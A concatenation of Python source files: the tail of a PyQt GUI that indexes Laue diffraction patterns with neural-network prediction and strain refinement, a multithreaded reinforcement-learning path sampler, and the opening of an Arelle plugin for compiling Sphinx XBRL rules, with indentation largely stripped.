rotation_matrix = self.rotation_matrix[index_plotfnc][0][image_no,:,:]
mat_glob_plotfnc = self.mat_global[index_plotfnc][0][image_no]
path = os.path.normpath(self.filenm[image_no].decode())
files = self.cor_file_directory+"//"+path.split(os.sep)[-1].split(".")[0]+".cor"
allres = IOLT.readfile_cor(files, True)
data_theta, data_chi, peakx, peaky, intensity = allres[1:6]
CCDcalib = allres[-1]
detectorparameters = allres[-2]
# print('detectorparameters from file are: '+ str(detectorparameters))
pixelsize = CCDcalib['pixelsize']
CCDLabel = CCDcalib['CCDLabel']
framedim = dictLT.dict_CCD[CCDLabel][0]
dict_dp={}
dict_dp['kf_direction']='Z>0'
dict_dp['detectorparameters']=detectorparameters
dict_dp['detectordistance']=detectorparameters[0]
dict_dp['detectordiameter']=pixelsize*framedim[0]#TODO*2
dict_dp['pixelsize']=pixelsize
dict_dp['dim']=framedim
dict_dp['peakX']=peakx
dict_dp['peakY']=peaky
dict_dp['intensity']=intensity
except:
print(self.cor_file_directory+"//"+path.split(os.sep)[-1].split(".")[0]+".cor")
print('chosen pixel coords are x = %d, y = %d'%(ix, iy))
print("No COR file could be found for the selected pixel")
return
if mat_glob_plotfnc == 1:
material_=self.material_
tolerance_add = float(self.tolerance.text())
elif mat_glob_plotfnc == 2:
material_=self.material1_
tolerance_add = float(self.tolerance1.text())
else:
print("No Material is indexed for this pixel")
material_ = None
tolerance_add = None
sim_twotheta = []
sim_chi = []
list_spots = []
residues = []
theo_index = []
sim_energy = []
sim_hkl = []
if np.all(rotation_matrix==0):
material_ = None
sim_twotheta = []
sim_chi = []
list_spots = []
residues = []
theo_index = []
sim_energy = []
sim_hkl = []
print("No rotation matrix found")
if material_ != None:
sim_twotheta, sim_chi, sim_energy, sim_hkl, \
list_spots, residues, theo_index = simulate_spots(rotation_matrix,
material_, self.emax, self.emin,
dict_dp['detectorparameters'], dict_dp,
tolerance_add, data_theta*2.0,
data_chi)
if len(sim_twotheta) == 0:
sim_twotheta = []
sim_chi = []
list_spots = []
residues = []
theo_index = []
sim_energy = []
sim_hkl = []
print("Nothing simulated")
w = MyPopup_image(data_theta, data_chi, intensity, sim_twotheta, sim_chi, sim_energy,
sim_hkl, ix, iy, files,
list_spots, residues, theo_index, rotation_matrix)
w.show()
self.popups.append(w)
print('chosen pixel coords are x = %d, y = %d'%(ix, iy))
except:
print("Error occured")
return
else:
print("Right Left for plotting the Indexation results; Left double click (or middle mouse) for Raw Laue patter and left click drag for lasso")
def update_data_mp1212(self):
if not self._outputs_queue.empty():
self.timermp1212.blockSignals(True)
n_range = self._outputs_queue.qsize()
for _ in range(n_range):
r_message_mpdata = self._outputs_queue.get()
strain_matrix_mpdata, strain_matrixs_mpdata, rotation_matrix_mpdata, col_mpdata, \
colx_mpdata, coly_mpdata, match_rate_mpdata, mat_global_mpdata, \
cnt_mpdata, meta_mpdata, files_treated_mpdata, spots_len_mpdata, \
iR_pixel_mpdata, fR_pixel_mpdata, best_match_mpdata, check_mpdata = r_message_mpdata
for i_mpdata in files_treated_mpdata:
self.files_treated.append(i_mpdata)
for intmat_mpdata in range(int(self.ubmat.text())):
self.check[cnt_mpdata,intmat_mpdata] = check_mpdata[cnt_mpdata,intmat_mpdata]
self.mat_global[intmat_mpdata][0][cnt_mpdata] = mat_global_mpdata[intmat_mpdata][0][cnt_mpdata]
self.strain_matrix[intmat_mpdata][0][cnt_mpdata,:,:] = strain_matrix_mpdata[intmat_mpdata][0][cnt_mpdata,:,:]
self.strain_matrixs[intmat_mpdata][0][cnt_mpdata,:,:] = strain_matrixs_mpdata[intmat_mpdata][0][cnt_mpdata,:,:]
self.rotation_matrix[intmat_mpdata][0][cnt_mpdata,:,:] = rotation_matrix_mpdata[intmat_mpdata][0][cnt_mpdata,:,:]
self.col[intmat_mpdata][0][cnt_mpdata,:] = col_mpdata[intmat_mpdata][0][cnt_mpdata,:]
self.colx[intmat_mpdata][0][cnt_mpdata,:] = colx_mpdata[intmat_mpdata][0][cnt_mpdata,:]
self.coly[intmat_mpdata][0][cnt_mpdata,:] = coly_mpdata[intmat_mpdata][0][cnt_mpdata,:]
self.match_rate[intmat_mpdata][0][cnt_mpdata] = match_rate_mpdata[intmat_mpdata][0][cnt_mpdata]
self.spots_len[intmat_mpdata][0][cnt_mpdata] = spots_len_mpdata[intmat_mpdata][0][cnt_mpdata]
self.iR_pix[intmat_mpdata][0][cnt_mpdata] = iR_pixel_mpdata[intmat_mpdata][0][cnt_mpdata]
self.fR_pix[intmat_mpdata][0][cnt_mpdata] = fR_pixel_mpdata[intmat_mpdata][0][cnt_mpdata]
self.best_match[intmat_mpdata][0][cnt_mpdata] = best_match_mpdata[intmat_mpdata][0][cnt_mpdata]
if self.use_previous_UBmatrix_name:
try:
                        # Perhaps save only the best matching-rate UB matrices in the file, instead of all UB matrices
                        # Or select only the best UB matrices when opening the file in the propose_UBmatrix function
## calculate average matching rate and save it
avg_match_rate1 = [[] for i in range(int(self.ubmat.text()))]
for intmat_mpdata in range(int(self.ubmat.text())):
avg_match_rate = []
for j in self.match_rate[intmat_mpdata][0][:]:
if j != 0:
avg_match_rate.append(j)
avg_match_rate1[intmat_mpdata].append(np.median(avg_match_rate))
np.savez_compressed(self.model_direc+'//rotation_matrix_indexed_1.npz',
self.rotation_matrix, self.mat_global,
self.match_rate, avg_match_rate1)
except:
print("Warning : Error saving the NPZ file; nothing to worry")
## update plot now
self.update_plot()
self.timermp1212.blockSignals(False)
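    ## Background prediction loop: build the expected file grid, create the COR directory, then process images either sequentially or by dispatching chunks to the worker processes.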
def plot_pcv1(self):
if self.use_previous_UBmatrix_name:
np.savez_compressed(self.model_direc+'//rotation_matrix_indexed_1.npz', self.rotation_matrix, self.mat_global, self.match_rate, 0.0)
cond = self.strain_plot_tech.currentText()
self.strain_calculation = False
if cond == "YES":
self.strain_calculation = True
cond_mode = self.matrix_plot_tech.currentText()
# =============================================================================
# ## Multi-processing routine
# =============================================================================
## Number of files to generate
grid_files = np.zeros((self.lim_x,self.lim_y))
self.filenm = np.chararray((self.lim_x,self.lim_y), itemsize=1000)
grid_files = grid_files.ravel()
self.filenm = self.filenm.ravel()
count_global = self.lim_x * self.lim_y
if self.ccd_label.currentText() == "Cor" or self.ccd_label.currentText() == "cor":
format_file = "cor"
else:
format_file = dictLT.dict_CCD[self.ccd_label.currentText()][7]
list_of_files = glob.glob(self.filenameDirec+'//'+self.experimental_prefix.text()+'*.'+format_file)
## sort files
        ## natural sort of the filenames (avoids TypeError: '<' not supported between instances of 'str' and 'int')
list_of_files.sort(key=lambda var:[int(x) if x.isdigit() else x for x in re.findall(r'[^0-9]|[0-9]+', var)])
if len(list_of_files) == count_global:
for ii in range(len(list_of_files)):
grid_files[ii] = ii
self.filenm[ii] = list_of_files[ii]
else:
print("expected "+str(count_global)+" files based on the XY grid ("+str(self.lim_x)+","+str(self.lim_y)+") defined by user")
print("But found "+str(len(list_of_files))+" files (either all data is not written yet or maybe XY grid definition is not proper)")
digits = len(str(count_global))
digits = max(digits,4)
for ii in range(count_global):
text = str(ii)
if ii < 10000:
string = text.zfill(4)
else:
string = text.zfill(5)
file_name_temp = self.filenameDirec+'//'+self.experimental_prefix.text()+string+'.'+format_file
## store it in a grid
self.filenm[ii] = file_name_temp
## access grid files to process with multi-thread
# self.check = np.zeros((count_global,int(self.ubmat.text())))
# =============================================================================
try:
blacklist = self.blacklist_file[0]
except:
blacklist = None
### Create a COR directory to be loaded in LaueTools
self.cor_file_directory = self.filenameDirec + "//" + self.experimental_prefix.text()+"CORfiles"
if format_file in ['cor',"COR","Cor"]:
self.cor_file_directory = self.filenameDirec
if not os.path.exists(self.cor_file_directory):
os.makedirs(self.cor_file_directory)
# while True:
if cond_mode == "Sequential":
self.predict_preprocess(cnt=self.cnt,
rotation_matrix=self.rotation_matrix,
strain_matrix=self.strain_matrix,
strain_matrixs=self.strain_matrixs,
col=self.col,
colx=self.colx,
coly=self.coly,
match_rate=self.match_rate,
spots_len=self.spots_len,
iR_pix=self.iR_pix,
fR_pix=self.fR_pix,
best_match = self.best_match,
mat_global=self.mat_global,
check=self.check,
detectorparameters=self.detectorparameters,
pixelsize=self.pixelsize,
angbins=self.angbins,
classhkl=self.classhkl,
hkl_all_class0=self.hkl_all_class0,
hkl_all_class1=self.hkl_all_class1,
emin=self.emin,
emax=self.emax,
material_=self.material_,
material1_=self.material1_,
symmetry=self.symmetry,
symmetry1=self.symmetry1,
lim_x= self.lim_x,
lim_y=self.lim_y,
strain_calculation=self.strain_calculation,
ind_mat=self.ind_mat, ind_mat1=self.ind_mat1,
model_direc=self.model_direc, tolerance=float(self.tolerance.text()),
tolerance1=float(self.tolerance1.text()),
matricies=int(self.ubmat.text()), ccd_label=self.ccd_label.currentText(),
filename_bkg=None, #self.filenamebkg,
intensity_threshold=float(self.intensity_threshold.text()),
boxsize=int(self.boxsize.text()),bkg_treatment=self.bkg_treatment.text(),
filenameDirec=self.filenameDirec,
experimental_prefix=self.experimental_prefix.text(),
blacklist_file =blacklist,
text_file=None,
files_treated=self.files_treated,
try_previous1=True,
wb = self.wb,
temp_key = self.temp_key,
cor_file_directory=self.cor_file_directory,
mode_spotCycle1 = self.mode_spotCycle,
softmax_threshold_global123 = self.softmax_threshold_global,
mr_threshold_global123=self.mr_threshold_global,
cap_matchrate123=self.cap_matchrate,
tolerance_strain123=self.tolerance_strain,
tolerance_strain1231=self.tolerance_strain1,
NumberMaxofFits123=self.NumberMaxofFits,
fit_peaks_gaussian_global123=self.fit_peaks_gaussian_global,
FitPixelDev_global123=self.FitPixelDev_global,
coeff123 = self.coeff,
coeff_overlap=self.coeff_overlap,
material0_limit=self.material0_limit,
material1_limit=self.material1_limit,
use_previous_UBmatrix_name=self.use_previous_UBmatrix_name,
material_phase_always_present = self.material_phase_always_present,
crystal=self.crystal,
crystal1=self.crystal1,
strain_free_parameters=self.strain_free_parameters)
elif cond_mode == "MultiProcessing":
try_prevs = False
if self.mode_spotCycle == "beamtime":
try_prevs = True
valu12 = [[self.filenm[ii].decode(), ii,
self.rotation_matrix,
self.strain_matrix,
self.strain_matrixs,
self.col,
self.colx,
self.coly,
self.match_rate,
self.spots_len,
self.iR_pix,
self.fR_pix,
self.best_match,
self.mat_global,
self.check,
self.detectorparameters,
self.pixelsize,
self.angbins,
self.classhkl,
self.hkl_all_class0,
self.hkl_all_class1,
self.emin,
self.emax,
self.material_,
self.material1_,
self.symmetry,
self.symmetry1,
self.lim_x,
self.lim_y,
self.strain_calculation,
self.ind_mat, self.ind_mat1,
self.model_direc, float(self.tolerance.text()),
float(self.tolerance1.text()),
int(self.ubmat.text()), self.ccd_label.currentText(),
None,
float(self.intensity_threshold.text()),
int(self.boxsize.text()),self.bkg_treatment.text(),
self.filenameDirec,
self.experimental_prefix.text(),
blacklist,
None,
self.files_treated,
                    try_prevs, ## try_previous is kept True, in case it gets stuck in a loop
self.wb,
self.temp_key,
self.cor_file_directory,
self.mode_spotCycle,
self.softmax_threshold_global,
self.mr_threshold_global,
self.cap_matchrate,
self.tolerance_strain,
self.tolerance_strain1,
self.NumberMaxofFits,
self.fit_peaks_gaussian_global,
self.FitPixelDev_global,
self.coeff,
self.coeff_overlap,
self.material0_limit,
self.material1_limit,
self.use_previous_UBmatrix_name,
self.material_phase_always_present,
self.crystal,
self.crystal1,
self.strain_free_parameters] for ii in range(count_global)]
chunks = chunker_list(valu12, self.ncpu)
chunks_mp = list(chunks)
meta = {'t1':time.time()}
for ijk in range(int(self.ncpu)):
self._inputs_queue.put((chunks_mp[ijk], self.ncpu, meta))
if cond_mode == "MultiProcessing":
print("Launched all processes")
def plot_btn_stop(self):
if self.matrix_plot_tech.currentText() == "MultiProcessing":
self.timermp1212.blockSignals(False)
run_flag = multip.Value('I', False)
while not self._outputs_queue.empty():
n_range = self._outputs_queue.qsize()
for _ in range(n_range):
continue
print("Flag for mp module: ",run_flag)
time.sleep(0.1)
self.timermp1212.stop()
self.cnt = 1
self.run = False
self.btn_config.setEnabled(True)
self.btn_stop.setEnabled(False)
self.btn_save.setEnabled(True)
def getfiles(self):
self.modelDirec = QFileDialog.getExistingDirectory(self, 'Select Folder in which model files are located')
def getfiles1(self):
self.filenameDirec = QFileDialog.getExistingDirectory(self, 'Select Folder in which Experimental data is or will be stored')
def getfileModel(self):
self.filenameModel = QFileDialog.getOpenFileName(self, 'Select the model weights H5 or HDF5 file')
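    ## Sequential-mode pipeline: peak search on each image, COR file writing, angular-histogram encoding, neural-network prediction and UB matrix/strain refinement.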
def predict_preprocess(self,cnt,rotation_matrix,strain_matrix,strain_matrixs,
col,colx,coly,match_rate,spots_len,iR_pix,fR_pix,best_match,mat_global,
check,detectorparameters,pixelsize,angbins,
classhkl, hkl_all_class0, hkl_all_class1, emin, emax,
material_, material1_, symmetry, symmetry1,lim_x,lim_y,
strain_calculation, ind_mat, ind_mat1,
model_direc=None, tolerance =None, tolerance1 =None,
matricies=None, ccd_label=None,
filename_bkg=None,intensity_threshold=None,
boxsize=None,bkg_treatment=None,
filenameDirec=None, experimental_prefix=None,
blacklist_file =None, text_file=None, files_treated=None,try_previous1=False,
wb=None, temp_key=None, cor_file_directory=None, mode_spotCycle1=None,
softmax_threshold_global123=None,mr_threshold_global123=None,cap_matchrate123=None,
tolerance_strain123=None,tolerance_strain1231=None,NumberMaxofFits123=None,fit_peaks_gaussian_global123=None,
FitPixelDev_global123=None, coeff123=None,coeff_overlap=None,
material0_limit=None, material1_limit=None, use_previous_UBmatrix_name=None,
material_phase_always_present=None, crystal=None, crystal1=None, strain_free_parameters=None):
if ccd_label in ["Cor", "cor"]:
format_file = "cor"
else:
format_file = dictLT.dict_CCD[ccd_label][7]
list_of_files = glob.glob(filenameDirec+'//'+experimental_prefix+'*.'+format_file)
## sort files
        ## natural sort of the filenames (avoids TypeError: '<' not supported between instances of 'str' and 'int')
list_of_files.sort(key=lambda var:[int(x) if x.isdigit() else x for x in re.findall(r'[^0-9]|[0-9]+', var)])
for files in list_of_files:
print("# Predicting for "+ files)
self.update_plot()
call_global()
peak_detection_error = False
if self.run == False:
print("Analysis stopped")
break
if files in files_treated:
continue
files_treated.append(files)
if files.split(".")[-1] != "cor":
CCDLabel=ccd_label
seednumber = "Experimental "+CCDLabel+" file"
try:
out_name = blacklist_file
except:
out_name = None
if bkg_treatment == None:
bkg_treatment = "A-B"
try:
                    ### Max space = space between pixels
#print(CCDLabel)
peak_XY = RMCCD.PeakSearch(
files,
stackimageindex = -1,
CCDLabel=CCDLabel,
NumberMaxofFits=NumberMaxofFits123,
PixelNearRadius=10,
removeedge=2,
IntensityThreshold=intensity_threshold,
local_maxima_search_method=0,
boxsize=boxsize,
position_definition=1,
verbose=0,
fit_peaks_gaussian=fit_peaks_gaussian_global123,
xtol=0.001,
FitPixelDev=FitPixelDev_global123,
return_histo=0,
# Saturation_value=1e10, # to be merged in CCDLabel
# Saturation_value_flatpeak=1e10,
MinIntensity=0,
PeakSizeRange=(0.65,200),
write_execution_time=1,
Data_for_localMaxima = "auto_background",
formulaexpression=bkg_treatment,
Remove_BlackListedPeaks_fromfile=out_name,
reject_negative_baseline=True,
Fit_with_Data_for_localMaxima=False,
maxPixelDistanceRejection=15.0,
)
peak_XY = peak_XY[0]#[:,:2] ##[2] Integer peak lists
except:
print("Error in Peak detection for "+ files)
for intmat in range(matricies):
rotation_matrix[intmat][0][self.cnt,:,:] = np.zeros((3,3))
strain_matrix[intmat][0][self.cnt,:,:] = np.zeros((3,3))
strain_matrixs[intmat][0][self.cnt,:,:] = np.zeros((3,3))
col[intmat][0][self.cnt,:] = 0,0,0
colx[intmat][0][self.cnt,:] = 0,0,0
coly[intmat][0][self.cnt,:] = 0,0,0
match_rate[intmat][0][self.cnt] = 0
mat_global[intmat][0][self.cnt] = 0
cnt += 1
self.cnt += 1
peak_detection_error = True
continue
try:
s_ix = np.argsort(peak_XY[:, 2])[::-1]
peak_XY = peak_XY[s_ix]
except:
print("No peaks found for "+ files)
for intmat in range(matricies):
rotation_matrix[intmat][0][self.cnt,:,:] = np.zeros((3,3))
strain_matrix[intmat][0][self.cnt,:,:] = np.zeros((3,3))
strain_matrixs[intmat][0][self.cnt,:,:] = np.zeros((3,3))
col[intmat][0][self.cnt,:] = 0,0,0
colx[intmat][0][self.cnt,:] = 0,0,0
coly[intmat][0][self.cnt,:] = 0,0,0
match_rate[intmat][0][self.cnt] = 0
mat_global[intmat][0][self.cnt] = 0
cnt += 1
self.cnt += 1
peak_detection_error = True
continue
framedim = dictLT.dict_CCD[CCDLabel][0]
twicetheta, chi = Lgeo.calc_uflab(peak_XY[:,0], peak_XY[:,1], detectorparameters,
returnAngles=1,
pixelsize=pixelsize,
kf_direction='Z>0')
data_theta, data_chi = twicetheta/2., chi
framedim = dictLT.dict_CCD[CCDLabel][0]
dict_dp={}
dict_dp['kf_direction']='Z>0'
dict_dp['detectorparameters']=detectorparameters
dict_dp['detectordistance']=detectorparameters[0]
dict_dp['detectordiameter']=pixelsize*framedim[0]#TODO*2
dict_dp['pixelsize']=pixelsize
dict_dp['dim']=framedim
#print(framedim)
#print(pixelsize)
dict_dp['peakX']=peak_XY[:,0]
dict_dp['peakY']=peak_XY[:,1]
dict_dp['intensity']=peak_XY[:,2]
CCDcalib = {"CCDLabel":CCDLabel,
"dd":detectorparameters[0],
"xcen":detectorparameters[1],
"ycen":detectorparameters[2],
"xbet":detectorparameters[3],
"xgam":detectorparameters[4],
"pixelsize": pixelsize}
path = os.path.normpath(files)
IOLT.writefile_cor(cor_file_directory+"//"+path.split(os.sep)[-1].split(".")[0], twicetheta,
chi, peak_XY[:,0], peak_XY[:,1], peak_XY[:,2],
param=CCDcalib, sortedexit=0)
elif files.split(".")[-1] == "cor":
seednumber = "Experimental COR file"
allres = IOLT.readfile_cor(files, True)
data_theta, data_chi, peakx, peaky, intensity = allres[1:6]
CCDcalib = allres[-1]
detectorparameters = allres[-2]
# print('detectorparameters from file are: '+ str(detectorparameters))
pixelsize = CCDcalib['pixelsize']
CCDLabel = CCDcalib['CCDLabel']
framedim = dictLT.dict_CCD[CCDLabel][0]
dict_dp={}
dict_dp['kf_direction']='Z>0'
dict_dp['detectorparameters']=detectorparameters
dict_dp['detectordistance']=detectorparameters[0]
dict_dp['detectordiameter']=pixelsize*framedim[0]#TODO*2
dict_dp['pixelsize']=pixelsize
dict_dp['dim']=framedim
dict_dp['peakX']=peakx
dict_dp['peakY']=peaky
dict_dp['intensity']=intensity
if peak_detection_error:
continue
sorted_data = np.transpose(np.array([data_theta, data_chi]))
tabledistancerandom = np.transpose(GT.calculdist_from_thetachi(sorted_data, sorted_data))
codebars_all = []
if len(data_theta) == 0:
print("No peaks Found for : " + files)
for intmat in range(matricies):
rotation_matrix[intmat][0][self.cnt,:,:] = np.zeros((3,3))
strain_matrix[intmat][0][self.cnt,:,:] = np.zeros((3,3))
strain_matrixs[intmat][0][self.cnt,:,:] = np.zeros((3,3))
col[intmat][0][self.cnt,:] = 0,0,0
colx[intmat][0][self.cnt,:] = 0,0,0
coly[intmat][0][self.cnt,:] = 0,0,0
match_rate[intmat][0][self.cnt] = 0
mat_global[intmat][0][self.cnt] = 0
cnt += 1
self.cnt += 1
continue
spots_in_center = np.arange(0,len(data_theta))
for i in spots_in_center:
spotangles = tabledistancerandom[i]
spotangles = np.delete(spotangles, i)# removing the self distance
codebars = np.histogram(spotangles, bins=angbins)[0]
# codebars = histogram1d(spotangles, range=[min(angbins),max(angbins)], bins=len(angbins)-1)
## normalize the same way as training data
max_codebars = np.max(codebars)
codebars = codebars/ max_codebars
codebars_all.append(codebars)
## reshape for the model to predict all spots at once
codebars = np.array(codebars_all)
## Do prediction of all spots at once
# prediction = model.predict(codebars)
prediction = predict(codebars, wb, temp_key)
max_pred = np.max(prediction, axis = 1)
class_predicted = np.argmax(prediction, axis = 1)
# print("Total spots attempted:"+str(len(spots_in_center)))
# print("Took "+ str(time.time()-strat_time_P)+" seconds to predict spots")
predicted_hkl123 = classhkl[class_predicted]
predicted_hkl123 = predicted_hkl123.astype(int)
#print(predicted_hkl123)
s_tth = data_theta * 2.
s_chi = data_chi
rotation_matrix1, mr_highest, mat_highest, \
strain_crystal, strain_sample, iR_pix1, \
fR_pix1, spots_len1, best_match1,\
check12 = predict_ubmatrix(seednumber, spots_in_center, classhkl,
hkl_all_class0,
hkl_all_class1, files,
s_tth1=s_tth,s_chi1=s_chi,
predicted_hkl1=predicted_hkl123,
class_predicted1=class_predicted,
max_pred1=max_pred,
emin=emin,emax=emax,
material_=material_,
material1_=material1_,
lim_y=lim_y, lim_x=lim_x,
cnt=self.cnt,
dict_dp=dict_dp,
rotation_matrix=self.rotation_matrix,
mat_global=self.mat_global,
strain_calculation=strain_calculation,
ind_mat=ind_mat,
ind_mat1=ind_mat1,
tolerance=tolerance,
tolerance1 =tolerance1,
matricies=matricies,
tabledistancerandom=tabledistancerandom,
text_file = text_file,
try_previous1=try_previous1,
mode_spotCycle = mode_spotCycle1,
softmax_threshold_global123=softmax_threshold_global123,
mr_threshold_global123=mr_threshold_global123,
cap_matchrate123=cap_matchrate123,
tolerance_strain123=tolerance_strain123,
tolerance_strain1231=tolerance_strain1231,
coeff123=coeff123,
coeff_overlap=coeff_overlap,
material0_limit=material0_limit,
material1_limit=material1_limit,
model_direc=model_direc,
use_previous_UBmatrix_name=use_previous_UBmatrix_name,
material_phase_always_present=material_phase_always_present,
match_rate=self.match_rate,
check=self.check[self.cnt,:],
crystal=crystal,
crystal1=crystal1,
angbins=angbins,
wb=wb, temp_key=temp_key,
strain_free_parameters=strain_free_parameters)
for intmat in range(matricies):
if len(rotation_matrix1[intmat]) == 0:
col[intmat][0][self.cnt,:] = 0,0,0
colx[intmat][0][self.cnt,:] = 0,0,0
coly[intmat][0][self.cnt,:] = 0,0,0
else:
# mat_global[intmat][0][self.cnt] = mat_highest[intmat][0]
self.mat_global[intmat][0][self.cnt] = mat_highest[intmat][0]
final_symm =symmetry
final_crystal = crystal
if mat_highest[intmat][0] == 1:
final_symm = symmetry
final_crystal = crystal
elif mat_highest[intmat][0] == 2:
final_symm = symmetry1
final_crystal = crystal1
symm_operator = final_crystal._hklsym
# strain_matrix[intmat][0][cnt,:,:] = strain_crystal[intmat][0]
# strain_matrixs[intmat][0][cnt,:,:] = strain_sample[intmat][0]
self.strain_matrix[intmat][0][self.cnt,:,:] = strain_crystal[intmat][0]
self.strain_matrixs[intmat][0][self.cnt,:,:] = strain_sample[intmat][0]
# rotation_matrix[intmat][0][cnt,:,:] = rotation_matrix1[intmat][0]
self.rotation_matrix[intmat][0][self.cnt,:,:] = rotation_matrix1[intmat][0]
col_temp = get_ipf_colour(rotation_matrix1[intmat][0], np.array([0., 0., 1.]), final_symm, symm_operator)
# col[intmat][0][cnt,:] = col_temp
self.col[intmat][0][self.cnt,:] = col_temp
col_tempx = get_ipf_colour(rotation_matrix1[intmat][0], np.array([1., 0., 0.]), final_symm, symm_operator)
# colx[intmat][0][cnt,:] = col_tempx
self.colx[intmat][0][self.cnt,:] = col_tempx
col_tempy = get_ipf_colour(rotation_matrix1[intmat][0], np.array([0., 1., 0.]), final_symm, symm_operator)
# coly[intmat][0][cnt,:] = col_tempy
self.coly[intmat][0][self.cnt,:] = col_tempy
# match_rate[intmat][0][cnt] = mr_highest[intmat][0]
self.match_rate[intmat][0][self.cnt] = mr_highest[intmat][0]
# spots_len[intmat][0][cnt] = spots_len1[intmat][0]
self.spots_len[intmat][0][self.cnt] = spots_len1[intmat][0]
# iR_pix[intmat][0][cnt] = iR_pix1[intmat][0]
self.iR_pix[intmat][0][self.cnt] = iR_pix1[intmat][0]
# fR_pix[intmat][0][cnt] = fR_pix1[intmat][0]
self.fR_pix[intmat][0][self.cnt] = fR_pix1[intmat][0]
# best_match[intmat][0][cnt] = best_match1
self.best_match[intmat][0][self.cnt] = best_match1[intmat][0]
self.check[self.cnt,intmat] = check12[intmat]
cnt += 1
self.cnt += 1
def toggle_selector(event):
print(' Key pressed.')
if event.key in ['Q', 'q'] and toggle_selector.RS.active:
print(' RectangleSelector deactivated.')
toggle_selector.RS.set_active(False)
if event.key in ['A', 'a'] and not toggle_selector.RS.active:
print(' RectangleSelector activated.')
toggle_selector.RS.set_active(True)
def toggle_selector1(event):
print(' Key pressed.')
    if event.key in ['Q', 'q'] and toggle_selector1.RS.active:
        print(' LineSelector deactivated.')
        toggle_selector1.RS.set_active(False)
    if event.key in ['A', 'a'] and not toggle_selector1.RS.active:
        print(' LineSelector activated.')
        toggle_selector1.RS.set_active(True)
def start():
""" start of GUI for module launch"""
# Handle high resolution displays:
# fixes same widgets size across different screens
if hasattr(QtCore.Qt, 'AA_EnableHighDpiScaling'):
QtWidgets.QApplication.setAttribute(QtCore.Qt.AA_EnableHighDpiScaling, True)
if hasattr(QtCore.Qt, 'AA_UseHighDpiPixmaps'):
QtWidgets.QApplication.setAttribute(QtCore.Qt.AA_UseHighDpiPixmaps, True)
app = QApplication(sys.argv)
try:
screen = app.primaryScreen()
print('Screen: %s' % screen.name())
size = screen.size()
print('Size: %d x %d' % (size.width(), size.height()))
rect = screen.availableGeometry()
print('Available: %d x %d' % (rect.width(), rect.height()))
win = Window(rect.width()//2.5, rect.height()//1.2)
except:
win = Window()
win.show()
sys.exit(app.exec_())
if __name__ == "__main__":
start()
|
parallel_sampler.py
|
"""Author: Brandon Trabucco, Copyright 2019"""
import threading
import numpy as np
from mineral.core.samplers.sampler import Sampler
from mineral.core.samplers.path_sampler import PathSampler
class ParallelSampler(Sampler):
def __init__(
self,
*args,
num_threads=4,
max_path_length=256,
num_warm_up_paths=1024,
num_exploration_paths=32,
num_evaluation_paths=32,
**kwargs
):
Sampler.__init__(
self,
max_path_length=max_path_length,
num_warm_up_paths=num_warm_up_paths,
num_exploration_paths=num_exploration_paths,
num_evaluation_paths=num_evaluation_paths,
**kwargs)
self.num_threads = num_threads
self.inner_samplers = [
PathSampler(
*args,
max_path_length=max_path_length,
num_warm_up_paths=(num_warm_up_paths % num_threads + num_warm_up_paths // num_threads),
num_exploration_paths=(num_exploration_paths % num_threads + num_exploration_paths // num_threads),
num_evaluation_paths=(num_evaluation_paths % num_threads + num_evaluation_paths // num_threads),
**kwargs)]
for _i in range(1, num_threads):
self.inner_samplers.append(PathSampler(
*args,
max_path_length=max_path_length,
num_warm_up_paths=num_warm_up_paths//num_threads,
num_exploration_paths=num_exploration_paths//num_threads,
num_evaluation_paths=num_evaluation_paths//num_threads,
**kwargs))
lock = threading.Lock()
def increment_function():
lock.acquire()
self.increment()
lock.release()
for inner_sampler in self.inner_samplers:
inner_sampler.increment = increment_function
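    # Run thread_function once per inner sampler (one thread each), join the threads and return the collected rewards.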
def collect(
self,
thread_function
):
reward_list = []
threads = [threading.Thread(
target=thread_function, args=(sampler, reward_list)) for sampler in self.inner_samplers]
for t in threads:
t.start()
for t in threads:
t.join()
return reward_list
def warm_up(
self,
render=False,
**render_kwargs
):
def thread_function(inner_sampler, output_list):
output_list.extend(inner_sampler.warm_up(render=render, **render_kwargs))
return self.collect(thread_function)
def explore(
self,
render=False,
**render_kwargs
):
def thread_function(inner_sampler, output_list):
output_list.extend(inner_sampler.explore(render=render, **render_kwargs))
return self.collect(thread_function)
def evaluate(
self,
render=False,
**render_kwargs
):
def thread_function(inner_sampler, output_list):
output_list.extend(inner_sampler.evaluate(render=render, **render_kwargs))
return self.collect(thread_function)
|
__init__.py
|
'''
sphinx is an example of a package plug-in to both GUI menu and command line/web service
that compiles a Sphinx Rules file into an XBRL Formula Linkbase either to be saved or to
be directly executed by Arelle XBRL Formula processing.
This plug-in is a python package, and can be loaded by referencing the containing
directory (usually, "sphinx"), and selecting this "__init__.py" file within the sphinx
directory (such as in a file chooser).
(c) Copyright 2013 Mark V Systems Limited, California US, All rights reserved.
Mark V copyright applies to this software, which is licensed according to the terms of Arelle(r).
Sphinx is a Rules Language for XBRL described by a Sphinx 2 Primer
(c) Copyright 2012 CoreFiling, Oxford UK.
Sphinx copyright applies to the Sphinx language, not to this software.
Mark V Systems conveys neither rights nor license for the Sphinx language.
'''
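# Illustrative command lines (a sketch, not from the original source): the options
# are registered below by sphinxToLBCommandLineOptionExtender; the executable name
# and the --plugins/--file arguments are assumed Arelle conventions, and the rule
# file names are placeholders.
#
#   arelleCmdLine --plugins sphinx --file filing-instance.xbrl \
#       --import-sphinx "rules1.xsr|rules2.xsr"
#
#   arelleCmdLine --plugins sphinx \
#       --generate-sphinx-formula-linkbase "rules.xrb" \
#       --generated-sphinx-formulas-directory out/formulas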
import time, os, io, sys
from arelle.ModelValue import qname
from arelle import XmlUtil
logMessage = None
def sphinxFilesDialog(cntlr):
# get multiple file names of the sphinx files
sphinxFiles = cntlr.uiFileDialog("open",
multiple=True, # expect multiple sphinx files
title=_("arelle - Open sphinx rules files"),
initialdir=cntlr.config.setdefault("sphinxRulesFileDir","."),
filetypes=[(_("Sphinx files .xsr"), "*.xsr"), (_("Sphinx archives .xrb"), "*.xrb")],
defaultextension=".xsr")
if not sphinxFiles:
return None
cntlr.config["sphinxRulesFileDir"] = os.path.dirname(sphinxFiles[0])
cntlr.saveConfig()
return sphinxFiles
def generatedFormulasDirDialog(cntlr):
from tkinter.filedialog import askdirectory
generatedFormulasDir = askdirectory(parent=cntlr.parent,
initialdir=cntlr.config.setdefault("sphinxGeneratedFormulasDir","."),
title='Please select a directory for formulas generated from sphinx')
cntlr.config["sphinxGeneratedFormulasDir"] = generatedFormulasDir
cntlr.saveConfig()
return generatedFormulasDir
def sphinxFilesOpenMenuEntender(cntlr, menu):
def sphinxFileMenuCommand():
from arelle import ModelDocument
import os, sys, traceback
